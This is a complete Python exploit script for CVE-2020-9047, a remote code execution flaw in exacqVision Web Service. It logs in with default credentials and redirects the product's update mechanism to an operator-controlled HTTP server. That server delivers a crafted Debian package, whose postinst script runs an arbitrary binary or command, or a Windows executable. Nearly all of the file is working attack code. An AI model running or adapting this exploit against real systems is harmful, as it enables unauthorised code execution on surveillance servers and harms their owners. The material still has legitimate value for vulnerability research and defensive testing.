#!/usr/bin/python3
# Exploit Title: exacqVision Web Service 3.8.2.67295 - 20.06.3.0 - Remote Code Execution
# Date: 2020-07-13
# Exploit Author: Michael W. Norris
# Technical Details: https://mnorris.io/research/CVE-2020-9047/
# Vendor Homepage: https://www.exacq.com/
# Software Link: https://www.exacq.com/support/downloads.php
# Tested On: exacqVision Web Service 3.8.2.67295 - 20.06.3.0
# CVE: CVE-2020-9047
# Source PoC: https://github.com/norrismw/CVE-2020-9047

import argparse
import hashlib
import http.server
import json
import os
import shutil
import socketserver
import subprocess
import sys
import tempfile
import threading
import time
import uuid

import requests

# ---------------------------------------------------------------------------
# Command-line interface.
#
# The parsed values are published as module-level names because both classes
# below read them directly (system, rhost, rport, lhost, lport, payload,
# command_flag, temp_dir, username, password).
# ---------------------------------------------------------------------------
description = 'Exploit for exacqVision Web Service as outlined in CVE-2020-9047. This program targets Windows and Linux x86 installations '
description += 'of exacqVision Web Service versions 3.8.2.67295 - 20.06.3.0. Written by Michael W. Norris.'
parser = argparse.ArgumentParser(description=description)

help_arg = 'The target operating system. Provide "WINDOWS" for Windows, "LINUX" for Linux, or "CHECK" to have this program perform a check. '
help_arg += 'When using "CHECK", \'\' can be provided for the LHOST and PAYLOAD arguments.'
# A list (not a set) keeps the order of the choices stable in --help output.
parser.add_argument('TARGET', choices=['WINDOWS', 'LINUX', 'CHECK'], help=help_arg)

parser.add_argument('RHOST', help='The IP address of the remote host; the IP address of the target.')

help_arg = 'The port on the remote host where exacqVision Web Service is running. Default: 80'
parser.add_argument('-p', metavar='RPORT', type=int, default=80, help=help_arg)

help_arg = 'The local IP address that will serve the payload for the remote host. This should not be "localhost" or "127.0.0.1". '
help_arg += 'The remote host will need to be able to connect to the provided IP address. This program should be run on the system with '
help_arg += 'the specified IP address.'
parser.add_argument('LHOST', help=help_arg)

help_arg = 'The local port that will be used to serve the payload file for the remote host. Default: 8000'
parser.add_argument('-s', metavar='LPORT', type=int, default=8000, help=help_arg)

help_arg = 'The absolute file path of an existing Windows executable (.exe) or Linux binary file on the local system. The binary will be '
help_arg += 'executed on the remote host. If the --command flag is set and "LINUX" was provided as the TARGET argument, enter a command '
help_arg += 'that will be executed on the remote host.'
parser.add_argument('PAYLOAD', help=help_arg)

help_arg = 'Sets the command flag. The flag allows for a command to be provided as the PAYLOAD argument instead of a file path to a binary. '
help_arg += 'The provided command will be executed on the remote host. The flag should be set only if "LINUX" was provided as the TARGET '
help_arg += 'argument.'
parser.add_argument('--command', default=False, action='store_true', help=help_arg)

help_arg = 'The local existing directory where a randomly named temporary directory will be created. Default: /tmp'
parser.add_argument('-d', metavar='WEBDIR', default='/tmp', help=help_arg)

help_arg = 'The username for authenticating to the remote exacqVision Web Service application. Default: admin'
parser.add_argument('-U', metavar='USERNAME', default='admin', help=help_arg)

help_arg = 'The password for authenticating to the remote exacqVision Web Service application. Default: admin256'
parser.add_argument('-P', metavar='PASSWORD', default='admin256', help=help_arg)

args = parser.parse_args()

system = args.TARGET
rhost = args.RHOST
rport = args.p
lhost = args.LHOST
lport = args.s
payload = args.PAYLOAD
command_flag = args.command
# Working directory for everything that is generated and served. It is
# removed by GenPayload.cleanup() or, failing that, by the finally clause
# around main() at the bottom of the file.
temp_dir = tempfile.mkdtemp(dir=args.d)
username = args.U
password = args.P


class GenPayload:
    """Build the files served to the target from inside ``temp_dir``.

    For a LINUX target this is a Debian package; for a WINDOWS target it is
    a copy of the supplied executable. In both cases an update-information
    file describing the package is written next to it.
    """

    # Random 8-character lowercase names generated once per run. The payload
    # name doubles as the Debian package name, so it is kept to lowercase
    # hex digits.
    random_infofile = uuid.uuid4().hex[:8]
    random_payload = uuid.uuid4().hex[:8]
    # URL at which the local HTTP server exposes the update-information file.
    server_url = 'http://%s:%s/%s' % (lhost, lport, random_infofile)

    def __init__(self):
        """Create the package directory skeleton and validate the flag combination.

        Exits (after printing the help text) when ``--command`` is combined
        with a WINDOWS target.
        """
        if system == 'LINUX':
            self.package_dir = '/' + self.random_payload
            self.debian_dir = '/DEBIAN'
            os.makedirs(temp_dir + self.package_dir + self.debian_dir)
            if not command_flag:
                # Directory inside the package that will hold the binary.
                self.ptmp_dir = '/tmp'
                os.makedirs(temp_dir + self.package_dir + self.ptmp_dir)
        if system == 'WINDOWS' and command_flag:
            parser.print_help()
            sys.exit()

    def copy_payload(self):
        """Copy the PAYLOAD file into the package tree (LINUX) or to ``<name>.exe``."""
        if system == 'LINUX' and not command_flag:
            destination = temp_dir + self.package_dir + self.ptmp_dir + '/' + self.random_payload
        else:
            destination = temp_dir + '/' + self.random_payload + '.exe'
        shutil.copyfile(payload, destination)

    def generate_control(self):
        """Write the ``DEBIAN/control`` file for the package."""
        control_path = temp_dir + self.package_dir + self.debian_dir + '/control'
        content = 'Package: {random}\nVersion: 99.99.99.9999\nArchitecture: all\n'
        content += 'Maintainer: {random}\nDescription: {random}\n'
        content = content.format(random=self.random_payload)
        with open(control_path, 'w') as control:
            control.write(content)

    def generate_postinst(self):
        """Write the executable ``DEBIAN/postinst`` script for the package.

        The script restarts the web service units and then either runs the
        user-supplied command (``--command``) or the packaged binary.
        """
        postinst_path = temp_dir + self.package_dir + self.debian_dir + '/postinst'
        content = '#!/bin/bash\nservice webservice start\nservice evapache restart\n'
        content += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n'
        if command_flag:
            # The user command is appended verbatim; it is deliberately not
            # passed through str.format(), so braces in it are left alone.
            content += '%s &' % (payload)
        else:
            launcher = 'chmod 2755 /tmp/{random} && /tmp/{random} &'
            content += launcher.format(random=self.random_payload)
        with open(postinst_path, 'w') as postinst:
            postinst.write(content)
        os.chmod(postinst_path, 0o0755)

    def build_package(self):
        """Run ``dpkg-deb`` on the package tree, then delete the tree.

        Cleans up and exits when ``/usr/bin/dpkg-deb`` is missing or returns
        a non-zero status.
        """
        package_root = temp_dir + self.package_dir
        try:
            result = subprocess.run(
                ['/usr/bin/dpkg-deb', '-Zgzip', '--build', package_root],
                stdout=subprocess.DEVNULL,
            )
        except FileNotFoundError:
            print('Just kidding. It appears that /usr/bin/dpkg-deb is not available on this system')
            GenPayload.cleanup(temp_dir)
            sys.exit()
        if result.returncode != 0:
            # Without this check the failure only shows up later, when the
            # missing .deb file is opened in generate_fileinfo().
            print('/usr/bin/dpkg-deb exited with status %s; the package was not built' % result.returncode)
            GenPayload.cleanup(temp_dir)
            sys.exit()
        shutil.rmtree(package_root)

    @staticmethod
    def package_md5sum(path):
        """Return the hexadecimal MD5 digest of the file at ``path``."""
        md5_hash = hashlib.md5()
        with open(path, 'rb') as target_file:
            md5_hash.update(target_file.read())
        return md5_hash.hexdigest()

    def generate_fileinfo(self):
        """Write the update-information file and return its file name.

        The file contains two sections (``<os>-x64`` and ``<os>``) that both
        point at the served package and carry its size and MD5 checksum.
        """
        if system == 'LINUX':
            os_name = 'Linux'
            ext = 'deb'
        else:
            os_name = 'Windows'
            ext = 'exe'
        file_name = self.random_payload + '.' + ext
        target_file = temp_dir + '/' + file_name
        md5sum = GenPayload.package_md5sum(target_file)
        info_file = temp_dir + '/' + self.random_infofile

        content = "[ev-WebService-{os}-x64-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
        content += "Link=http://{lh}:{lp}/{file}\nPackage={os}-x64\nProduct=webservice\n"
        content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n\n"
        content += "[ev-WebService-{os}-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
        content += "Link=http://{lh}:{lp}/{file}\nPackage={os}\nProduct=webservice\n"
        content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n"
        content = content.format(
            os=os_name,
            lh=lhost,
            lp=lport,
            file=file_name,
            fs=os.path.getsize(target_file),
            md5=md5sum,
            ext=ext,
        )
        with open(info_file, 'w') as file_info:
            file_info.write(content)
        return self.random_infofile

    @staticmethod
    def cleanup(path=None):
        """Remove the temporary directory tree and announce the shutdown.

        Callable both as ``instance.cleanup()`` and as
        ``GenPayload.cleanup(temp_dir)``; ``path`` defaults to the
        module-level ``temp_dir``.
        """
        if path is None:
            path = temp_dir
        print('\nRemoving temporary directory structure %s' % path)
        shutil.rmtree(path)
        print('Stopping HTTP server on 0.0.0.0:%s' % lport)
        time.sleep(1)


class InteractRemote:
    """HTTP conversation with the remote exacqVision Web Service."""

    # Versions for which vuln_check() does not query /health.web and so
    # cannot report the target OS.
    legacy_versions = ['3.10.4.72058', '3.12.4.76544', '3.8.2.67295', '7.0.2.81005', '7.2.7.86974', '7.4.3.89785', '7.6.4.94391']
    # Versions for which vuln_check() reads the OS from /health.web.
    health_versions = ['7.8.2.97826', '8.0.6.105408', '8.2.2.107285', '8.4.3.111614', '8.6.3.116175', '8.8.1.118913', '9.0.3.124620']
    health_versions += ['9.2.0.127940', '9.4.3.137684', '9.6.7.145949', '9.8.4.149166', '19.03.3.152166', '19.06.4.157118']
    health_versions += ['19.09.4.0', '19.12.2.0', '20.03.2.0', '20.06.3.0']
    # Combined list, kept in the original order: the first seven entries are
    # the legacy versions, so existing [:7] / [7:] slices remain valid.
    vuln_versions = legacy_versions + health_versions

    def __init__(self):
        """Derive the target URLs from the parsed command-line values."""
        self.target = '%s:%s' % (rhost, rport)
        self.http_target = 'http://' + self.target
        self.server_url = GenPayload.server_url
        # Value written back by change_url(..., default=True).
        self.default_url = 'http://www.exacq.com/downloads/evFileInfo.txt'

    def vuln_check(self):
        """Report whether the target version is in the supported list.

        Returns True when the run may continue (always the case in CHECK mode
        for a listed version); every other outcome terminates the process via
        ``sys.exit()``. May prompt the operator for confirmation.
        """
        try:
            version = requests.get(self.http_target + '/version.web').text
            time.sleep(1)
        except (ConnectionRefusedError, OSError, TimeoutError):
            print('Failed to connect to the target: %s' % self.target)
            print('Is the target correct?')
            sys.exit()

        if version in self.health_versions:
            target_info = requests.get(self.http_target + '/health.web')
            json_info = json.loads(target_info.text)
            tar_system = json_info['os']['system']
            processor = json_info['os']['processor']
            print('Target OS: %s %s' % (tar_system, processor))
            print('EVWS Version: %s\n' % version)
            if tar_system.lower() in ('linux', 'windows'):
                if system == 'CHECK':
                    print('Exploitable: YES')
                    print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
                    return True
                try:
                    if system != tar_system.upper():
                        print('Exploitable: YES')
                        print('... but the provided TARGET argument does not match the remote operating system')
                        print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
                        sys.exit()
                    print('Exploitable: YES')
                    # --command is only accepted for LINUX targets (enforced in
                    # GenPayload.__init__), so the flag alone decides the hint.
                    if command_flag:
                        print('The provided command will be executed on the remote system')
                    else:
                        print('Confirm the specified PAYLOAD is compatible with the remote architecture')
                    cont_var = input('Press ENTER to continue or CTRL+C to exit\n')
                    if cont_var == '':
                        return True
                    sys.exit()
                except KeyboardInterrupt:
                    print('')
                    sys.exit()
            # An unrecognised OS falls through to the "Exploitable: NO" branch.

        if version in self.legacy_versions:
            print('Target OS: Unable to automatically determine target OS/architecture')
            print('EVWS Version: %s\n' % version)
            if system == 'CHECK':
                print('Exploitable: UNKNOWN')
                print('Manually determine the operating system/architecture of the remote system')
                return True
            try:
                print('Exploitable: YES')
                if system == 'LINUX' and command_flag:
                    print('... but only if the provided TARGET argument is accurate\n')
                else:
                    print('... but only if the provided TARGET and PAYLOAD arguments are accurate/relevant')
                cont_var = input('Press ENTER to try or CTRL+C to exit\n')
                if cont_var == '':
                    return True
                sys.exit()
            except KeyboardInterrupt:
                print('')
                sys.exit()
        else:
            print('Exploitable: NO')
            print('Target %s is not vulnerable and/or this program will not work on the target.' % self.target)
            sys.exit()

    def authenticate(self):
        """Log in with the supplied credentials and return the auth token.

        Exits when the service reports an unsuccessful login.
        """
        auth_check = requests.post(
            self.http_target + '/service.web',
            data={'action': 'login', 'u': username, 'p': password},
        )
        reply = json.loads(auth_check.text)
        time.sleep(1)
        if reply['success']:
            return reply['auth']
        print('Failed to authenticate due to invalid credentials')
        sys.exit()

    def change_url(self, auth_token, default=False):
        """Set the service's update URL and return the reported success flag.

        With ``default=False`` the URL of the local server is written; with
        ``default=True`` the stock ``default_url`` is written back.
        """
        url = self.default_url if default else self.server_url
        req_data = {'auth': auth_token, 'url': url, 'timeout': '10'}
        change_update = requests.post(self.http_target + '/service.web/updates', data=req_data)
        result = json.loads(change_update.text)['success']
        time.sleep(2)
        return result

    def check_updates(self, auth_token):
        """Ask the service to run an update check against the local server URL."""
        requests.get(self.http_target + '/service.web?auth=%s&action=updatecheck&updates_file=%s' % (auth_token, self.server_url))
        time.sleep(2)

    def download_update(self, auth_token):
        """Request the download, wait for it to finish, then request the update.

        Returns True when the final request reports success; otherwise cleans
        up the temporary directory and exits.
        """
        status_url = self.http_target + '/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token)

        req_data = {'auth': auth_token, 'action': 'downloadupdate', 'version': '99.99.99.9999'}
        requests.post(self.http_target + '/service.web', data=req_data)
        # The status endpoint is queried once before and once after the pause,
        # exactly as the original request sequence does.
        requests.get(status_url)
        time.sleep(2)
        progress = json.loads(requests.get(status_url).text)
        while progress['current_file_size'] != progress['total_file_size']:
            print('\nWaiting for download to complete.')
            time.sleep(1)
            progress = json.loads(requests.get(status_url).text)

        req_data = {'auth': auth_token, 'action': 'update', 'version': '99.99.99.9999'}
        update = requests.post(self.http_target + '/service.web', data=req_data)
        if json.loads(update.text)['success']:
            return True
        print('\nThe target was unable to download the payload from %s' % self.server_url)
        GenPayload.cleanup(temp_dir)
        sys.exit()

    def temporary_server(self):
        """Serve ``temp_dir`` over HTTP on all interfaces until the process ends."""
        print('Starting HTTP server on 0.0.0.0:%s' % lport)
        print('Serving payload from %s directory\n' % temp_dir)
        handler = http.server.SimpleHTTPRequestHandler
        # SimpleHTTPRequestHandler serves the current working directory.
        os.chdir(temp_dir)
        httpd = socketserver.TCPServer(('', lport), handler)
        httpd.serve_forever()

    def server_thread(self):
        """Start temporary_server() in a daemon thread and give it a moment to bind."""
        worker = threading.Thread(target=self.temporary_server)
        worker.daemon = True
        worker.start()
        time.sleep(1)


def main():
    """Run the check, or the full build / serve / update sequence."""
    w = InteractRemote()
    x = GenPayload()
    if system == 'CHECK':
        w.vuln_check()
        sys.exit()

    y = w.vuln_check()
    z = w.authenticate()
    if system == 'LINUX':
        x.generate_control()
        if not command_flag:
            x.copy_payload()
        x.generate_postinst()
        x.build_package()
    else:
        x.copy_payload()
    x.generate_fileinfo()
    w.server_thread()
    # NOTE(review): vuln_check() returns True, not the version string, so this
    # membership test is never true and the else branch always runs. Behaviour
    # is left as-is; confirm the intended flow before changing it.
    if y in InteractRemote.vuln_versions[7:]:
        w.change_url(z)
        w.check_updates(z)
        w.change_url(z, default=True)
        w.download_update(z)
    else:
        w.check_updates(z)
        w.download_update(z)
    x.cleanup()
    sys.exit()


if __name__ == '__main__':
    try:
        main()
    finally:
        # Several paths leave via sys.exit() without calling cleanup() (CHECK
        # mode, rejected flag combination, failed connection or login,
        # declined prompt). Remove the temporary directory if it still exists.
        if os.path.isdir(temp_dir):
            shutil.rmtree(temp_dir, ignore_errors=True)